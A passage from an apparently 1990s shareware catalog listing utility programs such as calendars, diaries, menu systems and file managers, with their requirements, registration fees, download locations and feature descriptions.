31/2" or 51/4" + master disk(s); 12 months of phone, fax, BBS, CompuServe, mail + support; 3-month limited return policy; bonus utilities; all + ASP-wide offers (see page 5); discounts on other products; + discounts on upgrades. + Look for: PCAL1471.ZIP on BBSs (call 703-323-6423 to download it + at no charge); PERCAL.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 7 (or contact userID 71141,1224 for assistance). + SWREG#: 280 + PsL#: 10115 + Download size: 192k (about 14 minutes with a 2400 baud modem) + Description: + Friendly Personal Information Manager (PIM) displays a 3-month + scrollable calendar, a running analog/digital clock, a time- + oriented event list of your appointments, and your notes. + Printable for pocket/purse. Keeps a historical diary. Warnings + and alarms tell when events are pending or overdue. Flexible + menu interface, run as a TSR or normal program. TSR can + interrupt you at the earliest event. Extremely stable, + environment sensitive TSR is a 6K kernel, with the balance + swapped to EMS or disk. + + + Product: Personal Schedule + Comprehensive calendar/schedule/proj mgr/PIM. See full + description on page 125. + + Chapter 2, "Utilities" 145 + + + + Product: A Project/Event Planner + Planner for projects, time-based activities. See full + description on page 303. + + Product: TASK MASTER + Project tracking program. See full description on page 303. + + Product: TC's Personal Data Manager + Author: , 612-722-9659 + Version: 1.20 (02-17-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: EGA monitor; Modem. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of CompuServe, mail support; discounts on upgrades. + Look for: availability unknown on BBSs; PDM120.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 16 (or contact userID 76470,3424 for + assistance). + SWREG#: 4773 + PsL#: 11839 + Download size: 1036k (about 77 minutes with a 2400 baud modem) + Description: + Features full month display of calendar with special events + that you choose. Phone/address book to keep your list of phone + numbers, can be sorted by last name or company name. Phone + dialer dials numbers directly from the phone book using your + modem. Call timer is provided to time the length of your calls. + To do lis helps keep track of important tasks. Note pad is used + to write notes & edit small text files. Almanac contains + information such as measurement conversions & ZIP codes. + + + Product: Visual Calendar Planner + Author: + Version: 1.1 (02-10-94) + Needs: IBM PC, Windows 3.0 or better. 1000k RAM. + Registration fee: $19.95 + Registration benefits: lifetime unlimited CompuServe, mail + support; all ASP-wide offers (see page 5); discounts on + upgrades. 6-month free upgrading allowed. 2 free update + disk(s) sent out. + Look for: availability unknown on BBSs. + PsL#: 11042 + Download size: 330k (about 25 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + The easiest calendar planner program to use, virtually + negligible learning curve. If you think you cannot handle a + sophisticated PIM, try using this. A powerful, yet extremely + easy to use calendar planner. Guaranteed to put you into + productivity within minutes after using it. Complete and real + + Chapter 2, "Utilities" 146 + + + + 3D look that resembles a desktop planner found on most office + desktop. + + + Product: WhizNotes + A text organizer & help generator for Windows. See full + description on page 192. + + Product: WinPost + Author: , 206-391-3483 + Version: 3.2b (07-01-93) + Needs: IBM AT (80286), Windows 3.0 or better. + Registration fee: $30.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited support. + Look for: availability unknown on BBSs; WPST32.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 12 (or contact userID 71570,533 + for assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Use to get rid of your Post-it(tm) notes! This Windows utility + allows the user to create and manage reminder notes. Icon Tool + Bar, mouse shortcuts and accelerator keys make this a very + intuitive and easy-to-use utility. Major features include OLE + server support, print facility, search facility, alarm notes, + numerous configuration parameters, auto save, and more. + Recipient of coveted PC Magazine's "Best of 1991 Award" + (1/14/92 issue). A must for Windows users! + + + Product: WinTickler + Tickler file management program. See full description on + page 304. + + 2.6.10 Time management + + Product: Above & Beyond + PIM for planning, managing your time. See full description on + page 137. + + Product: ChronoLog + Personal info/resource mgmt system for DOS. See full + description on page 139. + + Product: Contact-Lens! + Extremely fast contact manager/PIM. See full description on + page 140. + + Product: Day By Day + Scheduler, diary, task manager with password. See full + description on page 141. + + Chapter 2, "Utilities" 147 + + + + Product: DR. Memory + Easy, powerful, tickler/reminder program. See full description + on page 134. + + Product: Early Bird + Author: , 312-922-6313 + Version: 1.0f (03-01-95) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. + Look for: EBIRD10F.ZIP on BBSs (call 312-922-2839 to download it + at no charge); EBIRD*.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 17 (or contact userID 71532,3271 for assistance). + SWREG#: 4941 + PsL#: 11841 + Download size: 178k (about 13 minutes with a 2400 baud modem) + Description: + A home and business calendar/reminder program that is easy to + use, flexible, and powerful. It features simple or complex + reminder types, desktop calendar and scan modes, color pull- + down and pop-up menus, and context sensitive on-line help. + + + Product: Personal Calendar (PC) for DOS + TSR PIM appointment reminder, clock, calendar. See full + description on page 144. + + Product: Personal Schedule + Comprehensive calendar/schedule/proj mgr/PIM. See full + description on page 125. + + Chapter 2, "Utilities" 148 + + + + Product: Personal Time Card + Author: , 714-898-7262 + Version: 2.6 (10-29-93) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk; Mouse. + Registration fee: $18.50 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + discounts on other products. + Look for: FGSPTC.ZIP on BBSs; FGSPTC.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 6 (or contact userID 70233,1315 for + assistance). + Download size: 265k (about 20 minutes with a 2400 baud modem) + Description: + Keep your project time organized either daily or weekly. Keeps + your time cards in order of date and allow entries for job + number (project), description and time (regular and overtime). + Prints the cards for hard copies and back-up your files to + diskette. Multiple users need only create a directory for each + user to store files. + + + Product: A Project/Event Planner + Planner for projects, time-based activities. See full + description on page 303. + + Product: PUBLIC ACCESS(tm) + Front-end control for public PC access. See full description + on page 294. + + Product: TimeClock + Computer usage time tracking and reporting. See full + description on page 295. + + Chapter 2, "Utilities" 149 + + + + Product: Yellow Sticky for Windows 4.5 [***] + Author: , 804-823-6896 + Version: 4.5 (09-01-95) + Needs: IBM 80386, Windows 3.1 or better. 150k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; VGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $15.00 (add $2.95 for shipping to U.S. + addresses) (add $2.95 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; runtime license; all ASP- + wide offers (see page 5). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; YLWSTK45.ZIP on + CompuServe in CIS:WINPROD forum LIBrary 0 (or contact userID + 72176,2507 for assistance). + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Not a scheduler or day planner but a program to help you + organize your day and get tasks done that need to be done. + Provides current and next month windows, a "To Do" list for + today and for the scheduled date. When put in the StartUp + group, it lets the user see what needs to be done when his/her + computer is turned on. + + + 2.6.11 Journal/diary programs + + Product: Ample Notice + Very flexible appointment scheduler/alarm. See full + description on page 123. + + Product: ChronoLog + Personal info/resource mgmt system for DOS. See full + description on page 139. + + Chapter 2, "Utilities" 150 + + + + Product: Cumberland Diary + Author: , 615-647-4012 + Version: 1.3 (01-01-94) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; CGA monitor; + Hard disk. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; 2-month return policy; bonus utilities; all ASP-wide + offers (see page 5); discounts on other products. + Look for: availability unknown on BBSs; CDRY13.ZIP on CompuServe + in CIS:ROOTS forum LIBrary 3 (or contact userID 70713,3476 for + assistance). + Download size: 199k (about 15 minutes with a 2400 baud modem) + Description: + Powerful diary/ journal entry program with pull-down menus and + on-line help. Wordprocessor with cut & paste features, optional + password protection. Headings can be included for each entry. + ASCII import and export. Multi-entry text search. + + + Product: Day By Day + Scheduler, diary, task manager with password. See full + description on page 141. + + Product: Dear Diary + Author: , 201-635-1824 + Version: 3.0 (06-22-95) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. + Strongly recommended: Mouse. + Registration fee: $19.95 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe support; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: DIARY30.ZIP on BBSs; DIARY.ZIP on CompuServe in + CIS:WINAPD forum LIBrary 1 (or contact userID 76336,3271 for + assistance). + SWREG#: 3178 + PsL#: 11664 + Download size: 755k (about 56 minutes with a 2400 baud modem) + Description: + An innovative diary/daily journal program. It allows you to + enter up to 64000 characters of notes per day. Includes text + search feature enabling you to zero in on dates in which you + entered information about specific people, events, etc. + Includes full on-line context sensitive Windows help system. + Data is stored in MS-Access 2.0 format for easy portability to + other applications. Supports international date formats. + + Chapter 2, "Utilities" 151 + + + + Product: The Fish Expert + Finds fishing techniques; log, library tools. See full + description on page 553. + + Product: HOLD-ANYTHING! + Keeps track of any kind of data very easily! See full + description on page 243. + + Product: LessonPlanZ + Lesson planning made easy. See full description on page 462. + + Product: My Life + Diary and Journal for young & old alike. See full description + on page 566. + + Product: OMNIDay + Author: , 816-429-3558 + Version: 4.30 (10-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 5); disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: ODAY430.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ODAY.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 64 + Download size: 371k (about 28 minutes with a 2400 baud modem) + Description: + A benchmark system for electronic diary programs! Allows up to + 10 users, each with their own passcode. Optional encryption of + the opus (up to 10,000 possibilities). The user names the opus + and enters their own name as author. Automatic entry of text + date line, entry can be up to 5000 lines long. User can update + and delete entries. Will print out opus for selected dates or + all. Full featured text editor with on line help. Import + feature for those who travel. Includes diary keeping tips. + + + Product: OMNIDay For Windows + For recording your thoughts & memoirs. See full description on + page 210. + + Product: WinJottr + Instant access desktop notetaker. See full description on + page 136. + + Chapter 2, "Utilities" 152 + + + + 2.7 Menu systems & file managers + + See also: Utilities, Security programs, Computer access + security; Communications, Networks. + + 2.7.1 Menu systems + + Product: A Batch View + Menus/msgs/info/utilities for DOS batch files. See full + description on page 101. + + Product: BATUTIL + Batch enhancement language. See full description on page 102. + + Product: C-Menu/32 + Author: , 915-833-6778 + Version: 5.00 (08-06-94) + Needs: IBM 80386, DOS 3.0 or better. 640k RAM; VGA monitor; Hard + disk. + Strongly recommended: SVGA monitor; Mouse. + Registration fee: $28.95 (add $3.95 for shipping to U.S. + addresses) (add $3.95 for shipping to Canadian addresses) (add + $3.95 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe, mail support; bonus + utilities; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. + Look for: CMENU500.ZIP on BBSs (call 414-789-4210 to download it + at no charge); CMENU5.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 5 (or contact userID 72223,2016 for assistance). + SWREG#: 3174 + PsL#: 11520 + Download size: 610k (about 46 minutes with a 2400 baud modem) + Description: + A stunning easy to use 32-bit graphical (GUI) VGA only menu + system, C-Menu/32 is the Advanced Menuing System. C-Menu/32 has + many powerful and unique features. Configure an unlimited + number of entries and folders. Unique Windows application + launcher. Context sensitive on-line help. Attach icons to + entries and secure them with password protection. A novice mode + of operation. Beautiful 256 color screen savers, a QuickNote + pad, and an address book. Runs all programs while freeing all + memory. + + Chapter 2, "Utilities" 153 + + + + Product: clySmic Icon Bar + Author: , 518-438-5548 + Version: 2.20 (03-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $24.95 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; 2-month return + policy; bonus utilities; all ASP-wide offers (see page 5). + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; CB220.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 76156,164 + for assistance). + Download size: 440k (about 33 minutes with a 2400 baud modem) + Description: + Icon button bar program launcher. Features variable size + buttons, nestable (tree-structured) sub-bars. Uses icons from + EXE/DLL/ICOs. Can set colors, clicks to launch, vertical or + horizontal bar, many other options. Has drag n' drop program + launch, also a drag 'n' drop add-program-to-bar function. Shows + correct icons for launched DOS programs. Has startup menu bar, + full Windows help and install, much more! + + + Product: DaMenu + Author: , 607-539-6609 + Version: 2.01 (06-04-94) + Needs: IBM PC, DOS 3.3 or better. 314k RAM; CGA monitor; + Hercules monitor; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 51/4" master disk(s); 3 + months of unlimited phone, fax, BBS, CompuServe, mail support; + lifetime return policy; bonus utilities; all ASP-wide offers + (see page 5); discounts on other products. 1-month free + upgrading allowed. + Look for: DAMENU20.ZIP on BBSs (call 607-533-7072 to download it + at no charge); DMENU2.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 5 (or contact userID 73020,3205 for assistance); + DAMENU20.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 325k (about 24 minutes with a 2400 baud modem) + Description: + This program has come into its own as a `truely simple' DOS + menu with features as: Submenu support, CD-ROM awareness, + online help, online registration, file browser, control panel, + application specific password protection, spacebar page + advance, customizable screen saver/blanker & even a desktop + calculator. Other features include full mouse support, password + protection on `Exit to DOS' & menu mods, file preloading & 0k + memory overhead. + + Chapter 2, "Utilities" 154 + + + + Product: DAYO MENU + Author: , 407-291-3960 + Version: 4.14+ (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; bonus + data; discounts on other products; discounts on upgrades. + 1-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: DAYOME.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOME.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + A simple DOS level menu system for use with the DAYO line of + Business Applications. Many features are available as menu + options, ie: 18 screen fonts, 25, 43, or 50 lines per page, + system statistics, view user manuals, and more. + + + Product: DOS Menu + Author: , 216-659-9489 + Version: 2.20 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 192k RAM. + Strongly recommended: Hard disk. + Registration fee: $24.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; LAN license; site license; bonus + utilities; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: DOS220.ZIP on BBSs (call 216-661-9065 to download it at + no charge); DOS220.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 5 (or contact userID 73057,3113 for assistance); + DOS220.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Easy to set up and use menu system for all versions of DOS. Can + handle up to 10,000 menu entries that can run any programs, + commands, or batch files. + + Chapter 2, "Utilities" 155 + + + + Product: Easy Menu + Author: , 01625-614669 + Version: 6.4 (06-16-95) + Needs: IBM PC, DOS 5.0 or better. 256k RAM; Hard disk. + Registration fee: $25.00 + Registration benefits: 3 months of unlimited CompuServe, mail + support; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; EM.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 5 (or contact userID 100410,717 for + assistance). + SWREG#: 3046 + PsL#: 11493 + Download size: 153k (about twelve minutes with a 2400 baud modem) + Description: + There are many hard disk menu systems but none as + straightforward and easy to use as this. It does not have "Menu + Pages". All items are on a single scrollable menu which can + hold up to 200 items and has alphabetic search. EM Unloads + competely during the call to a menu item so there is no memory + overhead. All items can be either Open Access or Administrator + only. The system can be locked by password to the open access + items. Users without the password cannot exit to DOS. + + + Product: HandyDOS + File/disk, prof batching, video & menu utils. See full + description on page 115. + + Product: HDM - Hard Disk Menu + Author: , 216-659-9489 + Version: 5.01 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 320k RAM. Uses 0K (no bytes) + when running a program/command/batch file. + Strongly recommended: Hard disk; Hayes-compatible modem; Mouse. + Registration fee: $50.00 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; 1-month limited return + policy; LAN license; site license; bonus utilities; all ASP- + wide offers (see page 5); disks of other shareware; discounts + on other products. 1-month free upgrading allowed. + Look for: HDM501.ZIP on BBSs (call 216-661-9065 to download it at + no charge); HDM501.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 5 (or contact userID 73057,3113 for assistance); + HDM501.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + A DOS shell that hides the underlying operating system from + uninitiated users, yet does not get in the way of expert users. + Features: network & mouse support, multi-level security system, + usage logging and reporting, phone dialer, variable screen + blanker, automatic logon & logoff, timed execution, multi-user + + Chapter 2, "Utilities" 156 + + + + log on/off with passwords, extensive on-line help, file and + directory pick lists, user defined logo screen, DOS window, + pass keystrokes to user programs, 260,000 menu entries, not a + TSR. + + + Product: LAN Menu + Local Area Network menu for DOS based LANs. See full + description on page 384. + + Product: LegRoom + Make any program a TSR, swap to EMS/XMS/disk. See full + description on page 95. + + Product: New Menus for Windows + Author: , 910-791-7052 + Version: 1.41 (11-29-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; Hard disk. + Strongly recommended: Mouse. + Registration fee: $20.00 + Registration benefits: lifetime unlimited BBS, CompuServe, mail + support; all ASP-wide offers (see page 5); discounts on + upgrades. + Look for: NMFW141E.ARJ on BBSs (call 49-561-5740777 to download + it at no charge); NM141E.E on CompuServe in CIS:WINSHARE forum + LIBrary 9 (or contact userID 100412,3624 for assistance). + Download size: 550k (about 41 minutes with a 2400 baud modem) + Description: + A Win-shell similar to the UNIX X-Windows Manger OpenLook, + Motif and the 'Chicago' GUI. With a graph. popup menu for a + quick access to apps docs, directories, tasks and more. + Enhances window managment with a Virtual Desktop, layout + functions and enhanced system menu. Provides customizable + context senstive menus. Every menu, even apps menus, can be + stuck onto the desktop. Multi-user configuration. + + + Product: Notice Board + Notice board/information system for LANs. See full description + on page 385. + + Product: Open Menu + Author: , 604-433-5189 + Version: 2.5 (03-18-94) + Needs: IBM PC, DOS 3.1 or better. 512k RAM. + Registration fee: $0.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: DBZ**.ZIP on BBSs (multiple files). + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + Flexible fast general purpose menu program. Easily used batch + file like script language (compatible with teleshare/dos) with + many commands per menu entry. User defined grouping. User + + Chapter 2, "Utilities" 157 + + + + changeable help and can be used as on-line help system, or + reference system. Autoloading up to 9999 menu entries in + standard dBase format. Includes teleshare gather remote file + management and support. + + + Product: UltiMenu + Menu system for DOS programs. See full description on + page 164. + + 2.7.2 File managers + + Product: 4FILES + File manager, annotator and program launcher. See full + description on page 27. + + Product: CMFiler + Author: , 703-221-1833 + Version: 5.37d (07-15-95) + Needs: IBM PC, DOS 3.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: VGA monitor; Hard disk; Mouse. + Registration fee: $30.00 + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 12 months of phone, CompuServe, mail support; 3-month + return policy; bonus utilities; all ASP-wide offers (see + page 5); disks of other shareware; discounts on other products; + discounts on upgrades; registration commissions. + Look for: CF537D.ZIP on BBSs (call 703-680-9269 to download it at + no charge); CMFILE.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 5 (or contact userID 72130,1400 for assistance). + SWREG#: 15 + PsL#: 10657 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Excelent file manager for DOS. Acclaimed by PC Mag, DOS 6 + Secrets, Novell DOS 7 Unleashed. Split-screen display of + directory listings or trees, with full suite of dir and file + services in each mode. Built-in file editor, floppy disk + copier/formatter/scanner, menued launching facillity. Floppy + fill function, directory refresher, file split/join capability + and file notes facility add special power. Mouse and VGA + 25/43/50-line support, full color control. Fast! + + + Product: EDDY (EDit DirectorY) [***] + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 13. + + Product: ExamineZip + Text retrieval program for ZIP archives. See full description + on page 14. + + Chapter 2, "Utilities" 158 + + + + Product: File Manager Jr. + Author: , 208-664-3864 + Version: 1.2 (12-07-94) + Registration fee: $15.00 + Registration benefits: quick-reference card; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 1-month return policy; discounts on upgrades. + Look for: FMANJR12.ZIP on BBSs. + Download size: 53k (about four minutes with a 2400 baud modem) + Description: + A file manager for WinWord 6.0. Perform more than a dozen + file-management operations without having to switch to the + Windows File Manager. Open, move, copy, delete and undelete + files in any number of Word subdirectories and sub- + subdirectories. Create, rename and delete directories. + + + Product: File Maven + Author: + Version: 3.0 (03-14-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + CompuServe, mail support; discounts on upgrades. Parallel link + cable for file transfers. + Look for: FMAV30.ZIP on BBSs; FMAV30.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 0 (or contact userID 72124,3234 for + assistance). + SWREG#: 5014 + PsL#: 11917 + Download size: 166k (about 13 minutes with a 2400 baud modem) + Description: + An advanced DOS file manager and file transfer utility. + Features: Dual dir/pull down menus/50-line support, LapLink- + style file transfers via cable, ZIP/LHA/ARJ compressed file + support, ASCII/hex file viewer and text editor, file search, + split/join, date stamping, Blowfish encryption and secure file + wipe, context sensitive hypertext help system, Directory Maven + tree scanning/quick chdir, and much more! + + Chapter 2, "Utilities" 159 + + + + Product: FILE_HANDLE File Management [***] + Author: , +31-(0)416-351-469 + Version: 1.11 (08-20-95) + Needs: IBM PC, DOS 3.1 or better. 420k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk; Mouse. + Registration fee: NLG79.95 (add NLG20.00 for shipping to U.S. + addresses) (add NLG20.00 for shipping to Canadian addresses) + (add NLG20.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, CompuServe, mail + support; 3-month return policy; bonus templates; discounts on + upgrades. + Look for: FHD111.* on BBSs; FHD*.ZIP on CompuServe in CIS:PCUTIL + forum LIBrary 5 (or contact userID 100710,1352 for assistance). + SWREG#: 7618 + Download size: 237k (about 18 minutes with a 2400 baud modem) + Description: + Management program for DOS, Windows and LANs. Featuring a + flexible script driven File-Finder, a state-of-the-art File- + Manager with collision control, and an associative Program- + Launcher. Can perform system-wide operations. Superb mouse + control. CD-ROM and MO support. Its high level of consistancy + helps you doing your job better and quicker. Hook up your tools + and go! Large drives? Many files? Confused? This helps! "Change + the odds to your advantage by using File_Handle(tm)". + + + Product: FILE_MAN + Author: , 813-377-2515 + Version: 4.30 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. + Look for: FMAN430.ZIP on BBSs (call 813-371-2490 to download it + at no charge). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + A menu driven utility program that aids in managing disk files. + Directory and file names are displayed in sorted order with + file names sorted by name, extension, date or size. Single + files or groups may be quickly marked and then acted upon. The + actions include copy, move, spawn, append, erase, rename, + change attribute status, display, print and locate. Features + include context sensitive help, macro procedures, directory + tree, diskette labels and program parameter customization. + + Chapter 2, "Utilities" 160 + + + + Product: Keyed File System (OS/2) + Subroutines for keyed file support in OS/2. See full + description on page 400. + + Product: PMZIP + OS/2 Presentation Manager ZIP shell. See full description on + page 42. + + Product: PocketD Plus + Author: , +44-81-203-3731 + Version: 4.2 (11-05-94) + Needs: IBM PC, DOS 2.1 or better. 65k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $49.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 24 months of unlimited phone, CompuServe, mail + support; bonus utilities; all ASP-wide offers (see page 5); + disks of other shareware; discounts on other products. + Look for: POCK.ZIP on BBSs (call 619-755-7357 to download it at + no charge); POCK.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 3 (or contact userID 100031,3537 for assistance); POCK.ZIP on + GEnie in IBMPC forum LIBrary 0. + SWREG#: 1017 + PsL#: 10474 + Download size: 167k (about 13 minutes with a 2400 baud modem) + Description: + What PC's "Best Utility 1994" joint runner-up with Stacker 4.0 + and PsL's "Best Utility 1992". Tiny but superb color dir + lister, file COPY and immensely powerful file manager allowing + the user to quickly & easily carry out automated tasks either + too difficult or impossible by other means. Over 220+ options + from command-line or menu-driven interface. Full arch/dir + browsing, ZIP,ARC,PAK,ZOO,ARJ,LZH,SFX, COPY (23 options), + multiple display/exec template(s) (50 params), OS/2 & 4DOS, & + much more. + + Chapter 2, "Utilities" 161 + + + + Product: QFiler + Author: , 608-271-2090 + Version: 3.2 (07-15-91) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $20.00 + Registration benefits: Printed manual and disk; phone/BBS/ + newsletter support. + Look for: QF*.* on BBSs (multiple files) (call 608-271-3685 to + download it at no charge); QF32*.EXE on CompuServe in + CIS:PCUTIL forum LIBrary 5 (or contact userID 74275,745 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + This powerful file manager displays two sorted directories + side-by-side. Copy, rename, move or delete both files and + directories. View file contents in ascii or hex. View and print + directory tree. Find files on any drive. Create and remove + subdirectories. Locate duplicate files. Set or clear file + attributes. Change time/date stamps. Simplify use of file + compression utilities like LHA and PKZip. Rename disk volume + labels. Undelete or edit files. XCopy directories. Send files + to print queue. + + + Product: QuickDir + DOS and archive shell. Custom directory tree. See full + description on page 9. + + Product: ToolBOX + A simple yet uniquely powerful DOS shell. See full description + on page 19. + + Product: TOP + Ultimate DOS command enhancement utility. See full description + on page 99. + + Product: UltiMenu + Menu system for DOS programs. See full description on + page 164. + + Product: USEMGR + Know how many times each file on disk is used. See full + description on page 19. + + Product: WinZip + Windows ZIP util w/drag & drop, built-in ZIP. See full + description on page 45. + + Product: x-FILE3 + Network file management system. See full description on + page 379. + + Chapter 2, "Utilities" 162 + + + + Product: XDIR + Attach descriptive comments to DIR displays. See full + description on page 20. + + 2.7.3 Combined MS/FMs + + Product: ABmenu + Author: + Version: 1.6 (10-22-92) + Needs: IBM PC, DOS 3.3 or better. 10k RAM. + Registration fee: $10.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, mail support; bonus utilities; discounts on + upgrades; registration 